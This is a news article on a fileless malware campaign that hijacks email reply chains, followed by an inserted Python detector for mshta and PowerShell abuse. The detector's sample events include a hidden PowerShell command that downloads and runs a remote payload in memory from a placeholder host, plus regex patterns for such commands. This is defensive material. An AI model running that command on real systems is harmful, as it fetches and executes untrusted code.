
Email Under Attack: New Fileless Malware Campaign Targets Trusted Threads


“Reply Chain” Malware Attacks Infiltrate Email Systems, Trigger Global Cybersecurity Alarm

By an International Cybersecurity Correspondent

In a digital era where email remains the backbone of global communication, a new malware campaign is exploiting the very trust that fuels it. Cybercriminals are hijacking legitimate email conversations to deliver fileless malware, evading traditional security measures and compromising users across sectors from finance to education.

The latest analysis by cybersecurity firm ESET, reported by Infosecurity Magazine, reveals that this attack vector—known as a reply-chain phishing attack—has been refined to embed malicious scripts within ongoing email threads, making the messages appear authentic and increasing the likelihood of user engagement.

“This malware doesn’t come in with a bang—it slips in like a whisper,” said Eliska Jedlickova, security researcher at ESET. “It weaponizes trust by mimicking authentic conversations, which makes it incredibly effective.”


How the Attack Works

Unlike traditional malware that relies on suspicious attachments or links, this campaign leverages email thread hijacking, where attackers gain access to a legitimate user’s mailbox and reply to active conversations with infected content. These messages often contain HTML or PDF attachments that trigger PowerShell scripts—all without dropping any executable files, thus bypassing most endpoint detection systems.

The malware’s fileless nature allows it to:

  • Remain in memory without writing to disk
  • Exploit PowerShell and WMI (Windows Management Instrumentation) for persistence
  • Establish command-and-control (C2) communications to exfiltrate data

Sample attack flow:

  1. Access a compromised email account
  2. Reply to a real email thread with a malicious file disguised as a document or invoice
  3. Launch PowerShell in memory to retrieve a secondary payload
  4. Exfiltrate browser credentials, system info, and keystrokes

Human and Business Impact

The real-world consequences are mounting. Victims include small businesses, law firms, universities, and nonprofit organizations—entities that often lack the advanced detection infrastructure found in large enterprises.

In one case, a mid-sized logistics firm in Spain reported the theft of internal financial data after an employee unknowingly opened an HTML attachment from what appeared to be their supplier.

“We didn’t question the email. It was part of an ongoing chain with a partner we’ve worked with for years,” said the company’s CTO, who requested anonymity. “By the time we caught it, our entire billing system was compromised.”


Why It Matters Globally

This campaign is not just a regional threat—it’s a global wake-up call. The method’s success lies in its social engineering precision and its technical evasion capabilities. The malware is still being analyzed, but experts suggest it may be linked to financially motivated threat actors operating across Europe and Asia.

Moreover, the use of living-off-the-land binaries (LOLBins) like PowerShell and mshta.exe makes the malware stealthy, rendering standard antivirus solutions nearly useless unless paired with behavioral analysis tools or extended detection and response (XDR) platforms.


Expert Recommendations

Cybersecurity professionals are urging businesses to:

  • Implement multi-factor authentication (MFA) for all email accounts
  • Train employees to recognize reply-chain manipulation
  • Disable PowerShell on non-administrative endpoints
  • Deploy email filtering systems with behavioral sandboxing
  • Monitor outbound traffic for C2 communications and anomalies
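As an added illustration of the "behavioral analysis" the article calls for (this is not code from ESET, Infosecurity Magazine or the article), the following Python pass scans constructed process-creation events for the chain described above: a mail client or browser opening an HTML/PDF attachment that launches mshta.exe or PowerShell, followed by a PowerShell command that stages its payload in memory rather than on disk. The field names, process names and sample command lines are assumptions chosen for the example, not indicators from the campaign.

```python
# Added example: flag the LOLBin chain described in the article over
# constructed Sysmon-style process-creation events (parent, image, cmdline).
import re

# Parents under which a LOLBin launch is suspicious on a non-admin endpoint
# (assumed set: mail client, browsers, PDF reader where attachments open).
DOCUMENT_HANDLERS = {"outlook.exe", "msedge.exe", "chrome.exe", "acrord32.exe"}
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe"}

# Command-line traits typical of fileless staging; two or more together
# are treated as a hit, since any one alone (e.g. a hidden window) is noisy.
FILELESS_PATTERNS = [
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),  # encoded script
    re.compile(r"downloadstring|invoke-webrequest|\biwr\b", re.I),    # fetch payload
    re.compile(r"\biex\b|invoke-expression", re.I),                   # run in memory
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),                    # hide the window
]

def classify(event):
    """Return the reasons an event matches the reply-chain pattern, or []."""
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    reasons = []
    if image in LOLBINS and parent in DOCUMENT_HANDLERS:
        reasons.append(f"{image} spawned by {parent} (attachment opened)")
    if image in {"powershell.exe", "pwsh.exe"}:
        hits = [p.pattern for p in FILELESS_PATTERNS if p.search(cmd)]
        if len(hits) >= 2:
            reasons.append("in-memory staging indicators: " + ", ".join(hits))
    return reasons

def scan(events):
    """Return (event, reasons) pairs for every event that matches."""
    return [(e, r) for e in events if (r := classify(e))]

# Constructed sample events, not real telemetry; the URL is a placeholder.
SAMPLE_EVENTS = [
    {"parent": "OUTLOOK.EXE", "image": "mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\AppData\Local\Temp\Invoice_1138.html"'},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/stage2')\""},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},   # benign admin script
    {"parent": "svchost.exe", "image": "msedge.exe", "cmdline": "msedge.exe --type=renderer"},
]

if __name__ == "__main__":
    for event, reasons in scan(SAMPLE_EVENTS):
        print(f'{event["image"]} <- {event["parent"]}: {"; ".join(reasons)}')
```

Against the sample events the pass flags the Outlook-to-mshta launch and the hidden, in-memory PowerShell download, while leaving the scheduled backup script and the browser renderer untouched.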

“This is a clear reminder that cybersecurity isn’t just about firewalls—it’s about behavior, context, and training,” said Jedlickova.
